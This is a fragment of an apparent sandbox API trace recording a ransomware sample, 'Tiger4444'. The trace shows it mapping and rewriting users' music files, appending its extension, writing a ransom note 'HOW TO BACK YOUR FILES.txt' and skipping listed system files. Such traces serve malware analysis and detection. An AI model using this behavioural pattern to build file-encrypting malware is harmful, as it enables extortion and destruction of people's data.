RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.934] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0045.934] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3290, lpName=0x0) returned 0x2c8 [0045.934] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3290) returned 0xbe0000 [0045.935] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.935] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.935] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.935] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.935] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.935] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.935] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.935] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.935] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13738847345) returned 1 [0045.935] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.935] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0045.935] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.936] CloseHandle (hObject=0x2c8) returned 1 [0045.936] CloseHandle (hObject=0x260) returned 1 [0045.937] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\_9r81igxQbjAOcgmhEV.wav.Tiger4444") returned 81 [0045.937] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\_9r81igxQbjAOcgmhEV.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\_9r81igxqbjaocgmhev.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\_9r81igxQbjAOcgmhEV.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\_9r81igxqbjaocgmhev.wav.tiger4444"), dwFlags=0x1) returned 1 [0045.937] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=12176 | out: Addend=0xc6f980) returned 19143200 [0045.937] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4564 [0045.937] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7bc3b0, ftCreationTime.dwHighDateTime=0x1d4d4b4, ftLastAccessTime.dwLowDateTime=0xcecb8b90, ftLastAccessTime.dwHighDateTime=0x1d4d2fa, ftLastWriteTime.dwLowDateTime=0xcecb8b90, ftLastWriteTime.dwHighDateTime=0x1d4d2fa, nFileSizeHigh=0x0, nFileSizeLow=0x2f84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_9r81igxQbjAOcgmhEV.wav", cAlternateFileName="_9R81I~1.WAV")) returned 0 [0045.937] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.937] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.938] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.938] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.938] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.939] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.939] CloseHandle (hObject=0x260) returned 1 [0045.939] CloseHandle (hObject=0x2ac) returned 1 [0045.939] GetCurrentThreadId () returned 0xfa8 [0045.939] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0045.939] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd" [0045.939] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0045.939] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0045.940] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd" [0045.940] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\" [0045.940] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\.BFC0E91B00AE8A0620D3" [0045.940] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.942] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.947] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.948] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.948] CloseHandle (hObject=0x2ac) returned 1 [0045.949] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd") returned 39 [0045.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.949] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab83a660, ftCreationTime.dwHighDateTime=0x1d4d0a5, ftLastAccessTime.dwLowDateTime=0x7bdc7c60, ftLastAccessTime.dwHighDateTime=0x1d4caac, ftLastWriteTime.dwLowDateTime=0x8066cab0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0045.949] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.949] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.949] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.949] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.949] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab83a660, ftCreationTime.dwHighDateTime=0x1d4d0a5, ftLastAccessTime.dwLowDateTime=0x7bdc7c60, ftLastAccessTime.dwHighDateTime=0x1d4caac, ftLastWriteTime.dwLowDateTime=0x8066cab0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.949] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.949] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.949] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.949] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.949] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.949] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8066cab0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8066cab0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8066cab0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.949] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.949] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.949] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c1a5fc0, ftCreationTime.dwHighDateTime=0x1d4cb83, ftLastAccessTime.dwLowDateTime=0xaaeb9b10, ftLastAccessTime.dwHighDateTime=0x1d4cd42, ftLastWriteTime.dwLowDateTime=0xaaeb9b10, ftLastWriteTime.dwHighDateTime=0x1d4cd42, nFileSizeHigh=0x0, nFileSizeLow=0x18250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2FpKVPISO.mp3", cAlternateFileName="2FPKVP~1.MP3")) returned 1 [0045.949] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.949] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.949] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="Tiger4444.exe") returned -1 [0045.949] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2=".") returned 1 [0045.949] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="..") returned 1 [0045.950] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="windows") returned -1 [0045.950] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="bootmgr") returned -1 [0045.950] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="pagefile.sys") returned -1 [0045.950] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="boot") returned -1 [0045.950] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="ids.txt") returned -1 [0045.950] lstrcmpiW (lpString1="2FpKVPISO.mp3", lpString2="NTUSER.DAT") returned -1 [0045.950] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="2FpKVPISO.mp3" | out: lpString1="2FpKVPISO.mp3") returned="2FpKVPISO.mp3" [0045.950] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\2FpKVPISO.mp3", dwFileAttributes=0x0) returned 1 [0045.950] lstrlenW (lpString="2FpKVPISO.mp3") returned 13 [0045.950] lstrlenW (lpString="Tiger4444") returned 9 [0045.950] lstrcmpiW (lpString1="VPISO.mp3", lpString2="Tiger4444") returned 1 [0045.950] lstrlenW (lpString=".dll") returned 4 [0045.950] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0045.950] lstrlenW (lpString=".lnk") returned 4 [0045.950] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0045.950] lstrlenW (lpString=".ini") returned 4 [0045.950] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0045.950] lstrlenW (lpString=".sys") returned 4 [0045.950] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0045.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\2FpKVPISO.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\2fpkvpiso.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.951] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.951] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13740371136) returned 1 [0045.951] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=98896) returned 1 [0045.951] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.951] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0045.951] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18550, lpName=0x0) returned 0x2c8 [0045.951] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18550) returned 0xbe0000 [0045.954] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.954] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.954] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.954] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.954] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.954] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.954] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.954] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.954] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13740732544) returned 1 [0045.954] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.954] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0045.954] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.955] CloseHandle (hObject=0x2c8) returned 1 [0045.955] CloseHandle (hObject=0x260) returned 1 [0045.959] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\2FpKVPISO.mp3.Tiger4444") returned 63 [0045.959] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\2FpKVPISO.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\2fpkvpiso.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\2FpKVPISO.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\2fpkvpiso.mp3.tiger4444"), dwFlags=0x1) returned 1 [0045.960] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=98896 | out: Addend=0xc6f980) returned 19155376 [0045.960] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4565 [0045.960] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb786b0, ftCreationTime.dwHighDateTime=0x1d4ca2a, ftLastAccessTime.dwLowDateTime=0xc4706a40, ftLastAccessTime.dwHighDateTime=0x1d4ca6b, ftLastWriteTime.dwLowDateTime=0xc4706a40, ftLastWriteTime.dwHighDateTime=0x1d4ca6b, nFileSizeHigh=0x0, nFileSizeLow=0x6fd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5pycqsYyh9jtXU4a.mp3", cAlternateFileName="5PYCQS~1.MP3")) returned 1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="Tiger4444.exe") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2=".") returned 1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="..") returned 1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="windows") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="bootmgr") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="pagefile.sys") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="boot") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="ids.txt") returned -1 [0045.960] lstrcmpiW (lpString1="5pycqsYyh9jtXU4a.mp3", lpString2="NTUSER.DAT") returned -1 [0045.960] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="5pycqsYyh9jtXU4a.mp3" | out: lpString1="5pycqsYyh9jtXU4a.mp3") returned="5pycqsYyh9jtXU4a.mp3" [0045.960] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\5pycqsYyh9jtXU4a.mp3", dwFileAttributes=0x0) returned 1 [0045.961] lstrlenW (lpString="5pycqsYyh9jtXU4a.mp3") returned 20 [0045.961] lstrlenW (lpString="Tiger4444") returned 9 [0045.961] lstrcmpiW (lpString1="tXU4a.mp3", lpString2="Tiger4444") returned 1 [0045.961] lstrlenW (lpString=".dll") returned 4 [0045.961] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0045.961] lstrlenW (lpString=".lnk") returned 4 [0045.961] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0045.961] lstrlenW (lpString=".ini") returned 4 [0045.961] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0045.961] lstrlenW (lpString=".sys") returned 4 [0045.961] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0045.961] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\5pycqsYyh9jtXU4a.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\5pycqsyyh9jtxu4a.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.961] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.961] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13741419249) returned 1 [0045.961] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=28628) returned 1 [0045.961] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0045.961] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0045.961] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x72e0, lpName=0x0) returned 0x2c8 [0045.961] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x72e0) returned 0xbe0000 [0045.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.963] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13741608271) returned 1 [0045.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0045.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0045.963] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.963] CloseHandle (hObject=0x2c8) returned 1 [0045.963] CloseHandle (hObject=0x260) returned 1 [0045.965] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\5pycqsYyh9jtXU4a.mp3.Tiger4444") returned 70 [0045.966] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\5pycqsYyh9jtXU4a.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\5pycqsyyh9jtxu4a.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\5pycqsYyh9jtXU4a.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\5pycqsyyh9jtxu4a.mp3.tiger4444"), dwFlags=0x1) returned 1 [0045.966] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=28640 | out: Addend=0xc6f980) returned 19254272 [0045.966] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4568 [0045.966] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22976ee0, ftCreationTime.dwHighDateTime=0x1d4d285, ftLastAccessTime.dwLowDateTime=0xdabb5550, ftLastAccessTime.dwHighDateTime=0x1d4ce51, ftLastWriteTime.dwLowDateTime=0xdabb5550, ftLastWriteTime.dwHighDateTime=0x1d4ce51, nFileSizeHigh=0x0, nFileSizeLow=0x1295e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="926rqjMJjcledBP-.m4a", cAlternateFileName="926RQJ~1.M4A")) returned 1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="Tiger4444.exe") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2=".") returned 1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="..") returned 1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="windows") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="bootmgr") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="pagefile.sys") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="boot") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="ids.txt") returned -1 [0045.966] lstrcmpiW (lpString1="926rqjMJjcledBP-.m4a", lpString2="NTUSER.DAT") returned -1 [0045.967] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="926rqjMJjcledBP-.m4a" | out: lpString1="926rqjMJjcledBP-.m4a") returned="926rqjMJjcledBP-.m4a" [0045.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\926rqjMJjcledBP-.m4a", dwFileAttributes=0x0) returned 1 [0045.967] lstrlenW (lpString="926rqjMJjcledBP-.m4a") returned 20 [0045.967] lstrlenW (lpString="Tiger4444") returned 9 [0045.967] lstrcmpiW (lpString1="edBP-.m4a", lpString2="Tiger4444") returned -1 [0045.967] lstrlenW (lpString=".dll") returned 4 [0045.967] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.967] lstrlenW (lpString=".lnk") returned 4 [0045.967] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.967] lstrlenW (lpString=".ini") returned 4 [0045.967] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.967] lstrlenW (lpString=".sys") returned 4 [0045.967] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.967] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\926rqjMJjcledBP-.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\926rqjmjjcledbp-.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.967] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.967] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13742031587) returned 1 [0045.967] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76126) returned 1 [0045.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0045.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0045.967] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12c60, 